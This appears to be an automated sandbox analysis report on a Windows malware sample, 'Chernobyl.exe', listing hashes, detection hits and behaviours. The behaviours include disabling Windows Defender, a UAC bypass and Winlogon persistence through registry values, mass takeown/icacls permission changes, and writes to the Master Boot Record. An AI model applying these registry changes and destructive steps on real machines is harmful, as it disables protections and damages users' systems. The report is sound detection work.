Analysis
-
max time kernel
110s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-03-2024 02:01
Static task
static1
General
-
Target
Chernobyl.exe
-
Size
418KB
-
MD5
f5007f18070e9cfc0b23c5ebb25c4468
-
SHA1
cf430806009fe87580705a85474a8604c84292fe
-
SHA256
18f27d42b09fe462af83c3ec3e82842e09a7db2e9c69cb6044e977b7af87a3c9
-
SHA512
7b9de630ea04314813895e2dc8908429bc393f2a7c0dd50ed1ac7802f8ba3d36998886bd9da3dd7c857a992dd9aecf016eb55a0cb33a3b234fa1e3137f094c50
-
SSDEEP
6144:kibkUpo02222222222222222222222222222222222222222222222222222222u:ytH0NOZzv4TatsNqaJx
Malware Config
Signatures
-
Contains code to disable Windows Defender 4 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/1244-0-0x000000013F620000-0x000000013F68C000-memory.dmp disable_win_def behavioral1/memory/1244-2-0x000000001BB00000-0x000000001BB80000-memory.dmp disable_win_def behavioral1/memory/1244-4-0x000000001BB00000-0x000000001BB80000-memory.dmp disable_win_def \Users\Admin\AppData\Local\Temp\Chernobyl.exe disable_win_def -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Chernobyl.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 7744 takeown.exe 6404 takeown.exe 8084 takeown.exe 5244 takeown.exe 2764 takeown.exe 7452 takeown.exe 576 takeown.exe 4376 icacls.exe 5356 icacls.exe 5620 takeown.exe 5520 takeown.exe 5572 takeown.exe 7832 takeown.exe 8144 takeown.exe 4260 icacls.exe 4400 takeown.exe 3900 takeown.exe 3784 icacls.exe 4436 takeown.exe 5508 takeown.exe 2656 takeown.exe 2092 icacls.exe 3248 takeown.exe 7868 icacls.exe 1488 takeown.exe 3540 takeown.exe 3524 icacls.exe 2004 takeown.exe 1476 takeown.exe 3680 takeown.exe 4924 takeown.exe 5156 icacls.exe 1576 icacls.exe 1120 icacls.exe 5212 icacls.exe 5476 takeown.exe 7100 takeown.exe 7996 takeown.exe 3276 icacls.exe 4360 takeown.exe 3232 takeown.exe 4868 takeown.exe 5000 icacls.exe 1052 takeown.exe 6616 takeown.exe 3468 takeown.exe 5000 takeown.exe 6372 takeown.exe 7564 takeown.exe 476 icacls.exe 8040 takeown.exe 4072 icacls.exe 6064 takeown.exe 2220 takeown.exe 1756 takeown.exe 4276 takeown.exe 5464 takeown.exe 3452 takeown.exe 6352 takeown.exe 7624 takeown.exe 4980 icacls.exe 7632 takeown.exe 3340 icacls.exe 4660 takeown.exe -
Loads dropped DLL 5 IoCs
Processes:
pid process 1208 1208 1208 1208 1208 -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exepid process 2856 takeown.exe 2064 icacls.exe 4844 takeown.exe 3208 takeown.exe 3348 icacls.exe 6920 takeown.exe 5152 icacls.exe 6948 takeown.exe 6240 takeown.exe 5060 takeown.exe 3216 takeown.exe 5320 takeown.exe 6064 takeown.exe 8112 icacls.exe 4808 icacls.exe 5532 icacls.exe 6272 takeown.exe 2872 icacls.exe 6192 takeown.exe 7500 takeown.exe 5508 takeown.exe 8144 takeown.exe 5980 takeown.exe 7604 icacls.exe 3908 takeown.exe 4568 takeown.exe 5612 icacls.exe 5804 takeown.exe 7292 takeown.exe 6280 takeown.exe 6368 takeown.exe 4376 takeown.exe 3220 takeown.exe 3452 takeown.exe 4756 takeown.exe 6948 takeown.exe 7372 takeown.exe 4908 takeown.exe 7080 takeown.exe 7240 takeown.exe 380 takeown.exe 3752 takeown.exe 7404 takeown.exe 4668 takeown.exe 5616 takeown.exe 7924 takeown.exe 3468 takeown.exe 3340 takeown.exe 960 takeown.exe 5244 takeown.exe 4260 icacls.exe 5480 takeown.exe 1004 takeown.exe 3212 takeown.exe 6896 takeown.exe 1576 icacls.exe 3088 takeown.exe 4196 icacls.exe 6320 takeown.exe 3496 takeown.exe 6120 icacls.exe 4112 takeown.exe 5296 takeown.exe 5524 takeown.exe -
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" Chernobyl.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Chernobyl.exedescription ioc process File opened for modification \??\PhysicalDrive0 Chernobyl.exe -
Drops file in System32 directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File opened for modification C:\Windows\System32\kill.ico Chernobyl.exe File opened for modification C:\Windows\System32\wallpaper.jpg Chernobyl.exe -
Drops file in Windows directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File created C:\Windows\cluttscape.exe Chernobyl.exe File opened for modification C:\Windows\cluttscape.exe Chernobyl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies File Icons 3 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Modifies registry class 39 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon Chernobyl.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Chernobyl.exepid process 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe 1244 Chernobyl.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Chernobyl.exepid process 1244 Chernobyl.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
Chernobyl.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 1244 Chernobyl.exe Token: SeDebugPrivilege 1244 Chernobyl.exe Token: SeTakeOwnershipPrivilege 1688 takeown.exe Token: SeTakeOwnershipPrivilege 960 takeown.exe Token: SeTakeOwnershipPrivilege 2656 takeown.exe Token: SeTakeOwnershipPrivilege 2076 takeown.exe Token: SeTakeOwnershipPrivilege 2264 takeown.exe Token: SeTakeOwnershipPrivilege 2576 takeown.exe Token: SeTakeOwnershipPrivilege 1716 takeown.exe Token: SeTakeOwnershipPrivilege 3220 takeown.exe Token: SeTakeOwnershipPrivilege 3288 takeown.exe Token: SeTakeOwnershipPrivilege 3748 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 1756 takeown.exe Token: SeTakeOwnershipPrivilege 112 takeown.exe Token: SeTakeOwnershipPrivilege 3088 takeown.exe Token: SeTakeOwnershipPrivilege 4924 takeown.exe Token: SeTakeOwnershipPrivilege 5084 takeown.exe Token: SeTakeOwnershipPrivilege 3752 takeown.exe Token: SeTakeOwnershipPrivilege 1700 takeown.exe Token: SeTakeOwnershipPrivilege 5060 takeown.exe Token: SeTakeOwnershipPrivilege 4624 takeown.exe Token: SeTakeOwnershipPrivilege 4980 takeown.exe Token: SeTakeOwnershipPrivilege 4400 takeown.exe Token: SeTakeOwnershipPrivilege 4808 takeown.exe Token: SeTakeOwnershipPrivilege 5320 takeown.exe Token: SeTakeOwnershipPrivilege 5520 takeown.exe Token: SeTakeOwnershipPrivilege 5532 takeown.exe Token: SeTakeOwnershipPrivilege 6052 takeown.exe Token: SeTakeOwnershipPrivilege 6080 takeown.exe Token: SeTakeOwnershipPrivilege 6064 takeown.exe Token: SeTakeOwnershipPrivilege 6072 takeown.exe Token: SeTakeOwnershipPrivilege 5424 takeown.exe Token: SeTakeOwnershipPrivilege 5476 takeown.exe Token: SeTakeOwnershipPrivilege 5588 takeown.exe Token: SeTakeOwnershipPrivilege 6056 takeown.exe Token: SeTakeOwnershipPrivilege 6188 takeown.exe Token: SeTakeOwnershipPrivilege 6200 takeown.exe Token: SeTakeOwnershipPrivilege 6348 takeown.exe Token: SeTakeOwnershipPrivilege 6996 takeown.exe Token: SeTakeOwnershipPrivilege 6372 takeown.exe Token: SeTakeOwnershipPrivilege 6396 takeown.exe Token: SeTakeOwnershipPrivilege 6152 takeown.exe Token: SeTakeOwnershipPrivilege 6292 takeown.exe Token: SeTakeOwnershipPrivilege 7820 takeown.exe Token: SeTakeOwnershipPrivilege 7860 takeown.exe Token: SeTakeOwnershipPrivilege 7292 takeown.exe Token: SeTakeOwnershipPrivilege 7692 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Chernobyl.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1244 wrote to memory of 2192 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2192 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2192 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1696 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1696 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1696 1244 Chernobyl.exe cmd.exe PID 1696 wrote to memory of 668 1696 cmd.exe conhost.exe PID 1696 wrote to memory of 668 1696 cmd.exe conhost.exe PID 1696 wrote to memory of 668 1696 cmd.exe conhost.exe PID 1244 wrote to memory of 476 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 476 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 476 1244 Chernobyl.exe cmd.exe PID 2192 wrote to memory of 436 2192 cmd.exe rundll32.exe PID 2192 wrote to memory of 436 2192 cmd.exe rundll32.exe PID 2192 wrote to memory of 436 2192 cmd.exe rundll32.exe PID 1244 wrote to memory of 1520 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1520 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1520 1244 Chernobyl.exe cmd.exe PID 476 wrote to memory of 880 476 cmd.exe rundll32.exe PID 476 wrote to memory of 880 476 cmd.exe rundll32.exe PID 476 wrote to memory of 880 476 cmd.exe rundll32.exe PID 1244 wrote to memory of 1584 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1584 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1584 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1980 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1980 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1980 1244 Chernobyl.exe cmd.exe PID 1520 wrote to memory of 1644 1520 cmd.exe rundll32.exe PID 1520 wrote to memory of 1644 1520 cmd.exe rundll32.exe PID 1520 wrote to memory of 1644 1520 cmd.exe rundll32.exe PID 1584 wrote to memory of 1688 1584 cmd.exe rundll32.exe PID 1584 wrote to memory of 1688 1584 cmd.exe rundll32.exe PID 1584 wrote to memory of 1688 1584 cmd.exe rundll32.exe PID 1244 wrote to memory of 1552 1244 Chernobyl.exe rundll32.exe PID 1244 wrote to memory of 1552 1244 Chernobyl.exe rundll32.exe PID 1244 wrote to memory of 1552 1244 Chernobyl.exe rundll32.exe PID 1980 wrote to memory of 624 1980 cmd.exe rundll32.exe PID 1980 wrote to memory of 624 1980 cmd.exe rundll32.exe PID 1980 wrote to memory of 624 1980 cmd.exe rundll32.exe PID 1244 wrote to memory of 2828 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2828 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2828 1244 Chernobyl.exe cmd.exe PID 1552 wrote to memory of 2680 1552 cmd.exe rundll32.exe PID 1552 wrote to memory of 2680 1552 cmd.exe rundll32.exe PID 1552 wrote to memory of 2680 1552 cmd.exe rundll32.exe PID 1244 wrote to memory of 2840 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2840 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2840 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1104 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1104 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 1104 1244 Chernobyl.exe cmd.exe PID 2828 wrote to memory of 2952 2828 cmd.exe conhost.exe PID 2828 wrote to memory of 2952 2828 cmd.exe conhost.exe PID 2828 wrote to memory of 2952 2828 cmd.exe conhost.exe PID 1244 wrote to memory of 2216 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2216 1244 Chernobyl.exe cmd.exe PID 1244 wrote to memory of 2216 1244 Chernobyl.exe cmd.exe PID 2840 wrote to memory of 2824 2840 cmd.exe rundll32.exe PID 2840 wrote to memory of 2824 2840 cmd.exe rundll32.exe PID 2840 wrote to memory of 2824 2840 cmd.exe rundll32.exe PID 1104 wrote to memory of 1536 1104 cmd.exe rundll32.exe PID 1104 wrote to memory of 1536 1104 cmd.exe rundll32.exe PID 1104 wrote to memory of 1536 1104 cmd.exe rundll32.exe PID 1244 wrote to memory of 2200 1244 Chernobyl.exe conhost.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" Chernobyl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Checks whether UAC is enabled
- Modifies WinLogon
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies File Icons
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1244 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:476 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2216
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2200
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2096
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2764
-
